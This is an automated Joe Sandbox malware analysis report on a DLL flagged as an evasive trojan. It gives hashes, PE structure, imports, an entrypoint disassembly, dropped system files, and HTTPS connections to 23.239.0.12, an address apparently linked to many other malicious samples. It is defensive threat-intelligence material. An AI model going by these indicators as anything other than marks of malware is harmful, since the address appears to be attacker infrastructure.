                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                      Analysis ID:626476
                                                                                      Start date and time: 14/05/202204:20:122022-05-14 04:20:12 +02:00
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 8s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Sample file name:Ns2al4764F (renamed file extension from none to dll)
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                      Number of analysed new started processes analysed:34
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal80.troj.evad.winDLL@27/6@0/3
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HDC Information:Failed
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 99%
                                                                                      • Number of executed functions: 48
                                                                                      • Number of non-executed functions: 218
                                                                                      Cookbook Comments:
                                                                                      • Adjust boot time
                                                                                      • Enable AMSI
                                                                                      • Override analysis time to 240s for rundll32

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.223.24.244
                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      04:21:55API Interceptor11x Sleep call for process: svchost.exe modified
                                                                                      04:22:47API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      23.239.0.1256vvRzZVQI.dllGet hashmaliciousBrowse
                                                                                        8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                                          yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                            bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                              wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                  bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                    6ez8Bx2x6f.dllGet hashmaliciousBrowse
                                                                                                      2Bgxulf6QF.dllGet hashmaliciousBrowse
                                                                                                        sEfyaa5VPQ.dllGet hashmaliciousBrowse
                                                                                                          40Gbs8Qkm6.dllGet hashmaliciousBrowse
                                                                                                            wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                              c63rCWoXA0.dllGet hashmaliciousBrowse
                                                                                                                okkVJeYYLQ.dllGet hashmaliciousBrowse
                                                                                                                  kd5oAYcBC1.dllGet hashmaliciousBrowse
                                                                                                                    3xB7n07o8r.dllGet hashmaliciousBrowse
                                                                                                                      TODvFfngca.dllGet hashmaliciousBrowse
                                                                                                                        6ez8Bx2x6f.dllGet hashmaliciousBrowse
                                                                                                                          2Bgxulf6QF.dllGet hashmaliciousBrowse
                                                                                                                            sEfyaa5VPQ.dllGet hashmaliciousBrowse

                                                                                                                              Domains

                                                                                                                              No context

                                                                                                                              ASNs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              LINODE-APLinodeLLCUS56vvRzZVQI.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              6ez8Bx2x6f.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              2Bgxulf6QF.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              sEfyaa5VPQ.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              40Gbs8Qkm6.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              c63rCWoXA0.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              okkVJeYYLQ.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              kd5oAYcBC1.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              3xB7n07o8r.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              TODvFfngca.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              6ez8Bx2x6f.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              2Bgxulf6QF.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              sEfyaa5VPQ.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12

                                                                                                                              JA3 Fingerprints

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              51c64c77e60f3980eea90869b68c58a856vvRzZVQI.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              6ez8Bx2x6f.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              2Bgxulf6QF.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              sEfyaa5VPQ.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              40Gbs8Qkm6.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              c63rCWoXA0.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              okkVJeYYLQ.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              kd5oAYcBC1.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              3xB7n07o8r.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              TODvFfngca.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              6ez8Bx2x6f.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              2Bgxulf6QF.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              sEfyaa5VPQ.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):8192
                                                                                                                              Entropy (8bit):0.3593198815979092
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                                              MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                                              SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                                              SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                                              SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                                              Malicious:false
                                                                                                                              Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:MPEG-4 LOAS
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1310720
                                                                                                                              Entropy (8bit):0.24943050410255635
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4qgv:BJiRdwfu2SRU4qgv
                                                                                                                              MD5:D6A80BDC6229BD9EFD7958800C3EC64F
                                                                                                                              SHA1:379206562C6444E3BF5BAAD55DF65D5DF69CA871
                                                                                                                              SHA-256:39FBE9E3409B42EC7A4EF67D8E282F8BB82A997CC57DB8AA05AA64D63C01AF79
                                                                                                                              SHA-512:D8E51BBF26905FF137F30D5B2151014B62FD277D4A43453E5E06F3809FACAD63E50D65C588E2949D18603BBA3F09074B22E0DFB2D9411D8D28DEACBF8905672B
                                                                                                                              Malicious:false
                                                                                                                              Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x203e0985, page size 16384, Windows version 10.0
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):786432
                                                                                                                              Entropy (8bit):0.25059797890736757
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:/XM+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:/XTSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                              MD5:286E0A59D9AB803C229532CF2191A9CC
                                                                                                                              SHA1:DB4EB7EF37A10ADF55D97022C8A51BA380CE1AEF
                                                                                                                              SHA-256:D6E70DA6D0E48B178619F4D96BC5DBA7C6EFB3D0AFC28FAC39A2F345D95E7AF4
                                                                                                                              SHA-512:675882EC8D18E3A361F28A063623A2AF87AE6C9C18778843A6A7A3D33A94F315D0CB3F898E95E45F5E3CB2830133CA3C5407C48B31B312EB2D9B1250BB96396C
                                                                                                                              Malicious:false
                                                                                                                              Preview: >..... ................e.f.3...w........................)..........z..7....zc.h.(..........z....)..............3...w...........................................................................................................B...........@...................................................................................................... ............................................................................................................................................................................................................................................................z...................).......z..........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):16384
                                                                                                                              Entropy (8bit):0.07642731022417973
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:uzyZ7vSNikIZx/DmI0rdHZrDZoll3Vkttlmlnl:uzyZrSYrl3
                                                                                                                              MD5:E336441936F25D61CBD02EC3C4D48835
                                                                                                                              SHA1:A00684B265733FE0DDFF2C17C68B4FA7F939548C
                                                                                                                              SHA-256:F229E2F0BDBE834F0540A42F7583C16BD44AD719EB7A093778D9C0F9C5C8C8C4
                                                                                                                              SHA-512:DD94D40AF9195467605936919522ABF786B37BB408565B7C45967DF23830847C7BC0F2B9877EAF50B0194330498B3036B813423F8FE4C900D6A5AD87BDC6B27C
                                                                                                                              Malicious:false
                                                                                                                              Preview:..".....................................3...w..7....z.......z...............z.......z..7iW......z...................).......z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):55
                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                              Malicious:false
                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):10844
                                                                                                                              Entropy (8bit):3.1617719080513327
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:cY+38+DJM+i2Jt+iDQ+yw+f0+rU+0Jtk+EOtF+E7tC+EwZ+u:j+s+i+Z+z+B+c+Y+0g+J+j+d+u
                                                                                                                              MD5:76BC48F9620A957AABECCE84C62FBB74
                                                                                                                              SHA1:BF58BD236615E1382B4435D3254F82FCEE3CC8A2
                                                                                                                              SHA-256:79284D14118170848E8C20152317ED6891C93D2A0F1CE6F17523575F7E8753A8
                                                                                                                              SHA-512:445E809604498665B103C7228A5FEDC01E29ECD2021AE733B865B95DC67C9840B60952D1BE84343041BC83A31B7C786E507498E5348A85BBE802C6560526DB44
                                                                                                                              Malicious:false
                                                                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                              Entropy (8bit):6.482113296839602
                                                                                                                              TrID:
                                                                                                                              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                              • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                              • DOS Executable Generic (2002/1) 1.70%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                              File name:Ns2al4764F.dll
                                                                                                                              File size:545280
                                                                                                                              MD5:07cf30fbb8f6645454eed3f7781d1ae5
                                                                                                                              SHA1:3ea37e70f20524b481bcc0d33ebfc145c008925d
                                                                                                                              SHA256:672a3c846ca7630201810bd9317f38d270a259bb76fb27ed847137b0c4528f58
                                                                                                                              SHA512:1617aa9e14e67eaf374f0569d9c34e2ed2e04b9b0d29a66ba370668a6adf3494f2ef5375ca1f1a5ea48c3c02ed6832f2a21d35364ce595b715c39fe4005ba372
                                                                                                                              SSDEEP:12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZJHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNVR
                                                                                                                              TLSH:93C4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."

                                                                                                                              File Icon

                                                                                                                              Icon Hash:74f0e4ecccdce0e4

                                                                                                                              Static PE Info

                                                                                                                              General

                                                                                                                              Entrypoint:0x1800423a8
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x180000000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                              Time Stamp:0x627D8598 [Thu May 12 22:09:28 2022 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:5
                                                                                                                              OS Version Minor:2
                                                                                                                              File Version Major:5
                                                                                                                              File Version Minor:2
                                                                                                                              Subsystem Version Major:5
                                                                                                                              Subsystem Version Minor:2
                                                                                                                              Import Hash:b268dbaa2e6eb6acd16e04d482356598

                                                                                                                              Entrypoint Preview

                                                                                                                              Instruction
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+08h], ebx
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+10h], esi
                                                                                                                              push edi
                                                                                                                              dec eax
                                                                                                                              sub esp, 20h
                                                                                                                              dec ecx
                                                                                                                              mov edi, eax
                                                                                                                              mov ebx, edx
                                                                                                                              dec eax
                                                                                                                              mov esi, ecx
                                                                                                                              cmp edx, 01h
                                                                                                                              jne 00007F0140E81D97h
                                                                                                                              call 00007F0140E83F24h
                                                                                                                              dec esp
                                                                                                                              mov eax, edi
                                                                                                                              mov edx, ebx
                                                                                                                              dec eax
                                                                                                                              mov ecx, esi
                                                                                                                              dec eax
                                                                                                                              mov ebx, dword ptr [esp+30h]
                                                                                                                              dec eax
                                                                                                                              mov esi, dword ptr [esp+38h]
                                                                                                                              dec eax
                                                                                                                              add esp, 20h
                                                                                                                              pop edi
                                                                                                                              jmp 00007F0140E81C40h
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+08h], ecx
                                                                                                                              dec eax
                                                                                                                              sub esp, 00000088h
                                                                                                                              dec eax
                                                                                                                              lea ecx, dword ptr [00014D05h]
                                                                                                                              call dword ptr [0000FC7Fh]
                                                                                                                              dec esp
                                                                                                                              mov ebx, dword ptr [00014DF0h]
                                                                                                                              dec esp
                                                                                                                              mov dword ptr [esp+58h], ebx
                                                                                                                              inc ebp
                                                                                                                              xor eax, eax
                                                                                                                              dec eax
                                                                                                                              lea edx, dword ptr [esp+60h]
                                                                                                                              dec eax
                                                                                                                              mov ecx, dword ptr [esp+58h]
                                                                                                                              call 00007F0140E9091Ah
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+50h], eax
                                                                                                                              dec eax
                                                                                                                              cmp dword ptr [esp+50h], 00000000h
                                                                                                                              je 00007F0140E81DD3h
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+38h], 00000000h
                                                                                                                              dec eax
                                                                                                                              lea eax, dword ptr [esp+48h]
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+30h], eax
                                                                                                                              dec eax
                                                                                                                              lea eax, dword ptr [esp+40h]
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+28h], eax
                                                                                                                              dec eax
                                                                                                                              lea eax, dword ptr [00014CB0h]
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+20h], eax
                                                                                                                              dec esp
                                                                                                                              mov ecx, dword ptr [esp+50h]
                                                                                                                              dec esp
                                                                                                                              mov eax, dword ptr [esp+58h]
                                                                                                                              dec eax
                                                                                                                              mov edx, dword ptr [esp+60h]
                                                                                                                              xor ecx, ecx
                                                                                                                              call 00007F0140E908C8h
                                                                                                                              jmp 00007F0140E81DB4h
                                                                                                                              dec eax
                                                                                                                              mov eax, dword ptr [eax+eax+00000000h]

                                                                                                                              Rich Headers

                                                                                                                              Programming Language:
                                                                                                                              • [ C ] VS2008 build 21022
                                                                                                                              • [LNK] VS2008 build 21022
                                                                                                                              • [ASM] VS2008 build 21022
                                                                                                                              • [IMP] VS2005 build 50727
                                                                                                                              • [RES] VS2008 build 21022
                                                                                                                              • [EXP] VS2008 build 21022
                                                                                                                              • [C++] VS2008 build 21022

                                                                                                                              Data Directories

                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x55cf00x6f.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5544c0x3c.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x2dffc.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x590000xe1c.pdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x1d8.reloc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x520000x288.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                              Sections

                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x10000x504ca0x50600False0.389081940124zlib compressed data5.26882252971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                              .rdata0x520000x3d5f0x3e00False0.355405745968data5.39349575043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .data0x560000x20d80x1200False0.180772569444data2.18161586025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                              .pdata0x590000xe1c0x1000False0.44580078125data4.98556265168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .rsrc0x5a0000x2dffc0x2e000False0.839408542799data7.73448363752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .reloc0x880000x6f80x800False0.1796875data1.81179169858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                              Resources

                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                              RT_RCDATA0x5a0a00x2de00dataEnglishUnited States
                                                                                                                              RT_MANIFEST0x87ea00x15aASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                                              Imports

                                                                                                                              DLLImport
                                                                                                                              KERNEL32.dllExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
                                                                                                                              ole32.dllCoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc

                                                                                                                              Exports

                                                                                                                              NameOrdinalAddress
                                                                                                                              DllRegisterServer10x180042050
                                                                                                                              DllUnregisterServer20x180042080

                                                                                                                              Possible Origin

                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                              EnglishUnited States

                                                                                                                              Network Behavior

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              May 14, 2022 04:21:52.152120113 CEST49764443192.168.2.423.239.0.12
                                                                                                                              May 14, 2022 04:21:52.152203083 CEST4434976423.239.0.12192.168.2.4
                                                                                                                              May 14, 2022 04:21:52.152334929 CEST49764443192.168.2.423.239.0.12
                                                                                                                              May 14, 2022 04:21:52.168875933 CEST49764443192.168.2.423.239.0.12
                                                                                                                              May 14, 2022 04:21:52.168936968 CEST4434976423.239.0.12192.168.2.4
                                                                                                                              May 14, 2022 04:21:52.717540979 CEST4434976423.239.0.12192.168.2.4
